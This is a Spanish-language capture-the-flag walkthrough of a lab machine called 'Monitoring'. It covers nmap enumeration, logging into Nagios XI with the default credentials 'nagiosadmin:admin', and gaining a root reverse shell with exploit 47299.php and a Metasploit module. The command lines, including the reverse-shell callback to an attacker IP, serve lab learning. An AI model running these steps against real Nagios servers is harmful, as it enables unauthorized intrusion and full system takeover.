Monitoring

Enumeración

NMAP

Comenzamos como siempre enumerando de forma rápida los servicios que tiene abiertos el objetivo.

nmap -p- -vvv --open --min-rate 2000 -Pn -n 192.168.76.136

Están abiertos los puertos 22, 25, 80, 389, 443 y 5667. El siguiente paso será el escaneo profundo de estos servicios abiertos.

 -nmap -p22,25,80,389,443,5667 -Pn -n -sVC 192.168.76.136

Existen 6 puertos abiertos en el equipo target.

• Puerto 22 -> SSH -> OpenSSH 7.2

• Puerto 25 -> SMTP -> Postfix

• Puerto 80 -> HTTP -> Apache httpd 2.4.18

• Puerto 389 -> LDAP -> OpenLDAP 2.2.X - 2.3.X

• Puerto 443 -> HTTPS -> Apache httpd 2.4.18

• Puerto 5667 -> ?

Además de una versión que puede ser interesante más adelante, Nagios XI.

Enumeración Web

Tenemos abiertos los puertos 80 y 443, así que comenzamos viendo el contenido.

Se está ejecutando un servicio Nagios XI en el puerto 80. Revisando el código fuente no encontramos nada interesante. Pulsamos en "Acess Nagios XI" y se nos redirige a un inicio de sesión.

Probaremos algunas credenciales por defecto comunes admin:admin, admin:password... pero no obtenemos acceso. Vamos a buscar en Google las credenciales de inicio de sesión por defecto para Nagios y encontramos que el username por defecto es "nagiosadmin" y vamos a probar "admin" como contraseña. Tenemos credenciales para iniciar sesión en Nagios XI, "nagiosadmin:admin".

Vamos a enumerar los directorios disponibles, para lo cual utilizaremos dirsearch.

dirsearch -u "http://192.168.76.136" -i200,301 

No hay anda interesante.

Vamos a buscar vulnerabilidades para Nagios XI. Utilizaremos searchsploit.

Sabemos que la versión de Nagios es la 5.6.0

Explotación

Explotación manual

Descargamos el exploit para ver si se adapta a nuestras necesidades.

searchsploit -m 47299.php

Vemos como debemos ejecutarlo.

Nota: Debemos instalar "php dom"

sudo apt-get install php-dom

Una vez instalado "php dom" ejecutamos el exploit como se indicaba anteriormente y por otro lado, colocaremos un oyente nc en el puerto 4444.

php 47299.php --host=192.168.76.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.76 --reverseport=4444

Ya tenemos conexión con la máquina objetivo, además de privilegios máximos. Vamos a buscar en este caso la única flag existente, proof.txt.

Ya tendríamos la máquina acabada.

Explotación vía Metasploit

Una vez hemos realizado la exploit vía "manual", vamos a realizar la vulneración utilizando Metasploit. Vamos a ello.

use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

Configuramos el exploit.

Y ejecutamos.

Y ya volveriamos a tener conexión con la máquina objetivo. Solo quedaría volver a buscar la flag proof.txt.

Y tendríamos acabada la máquina, esta vez de manera automatiza utilizando un exploit de la herramienta Metasploit.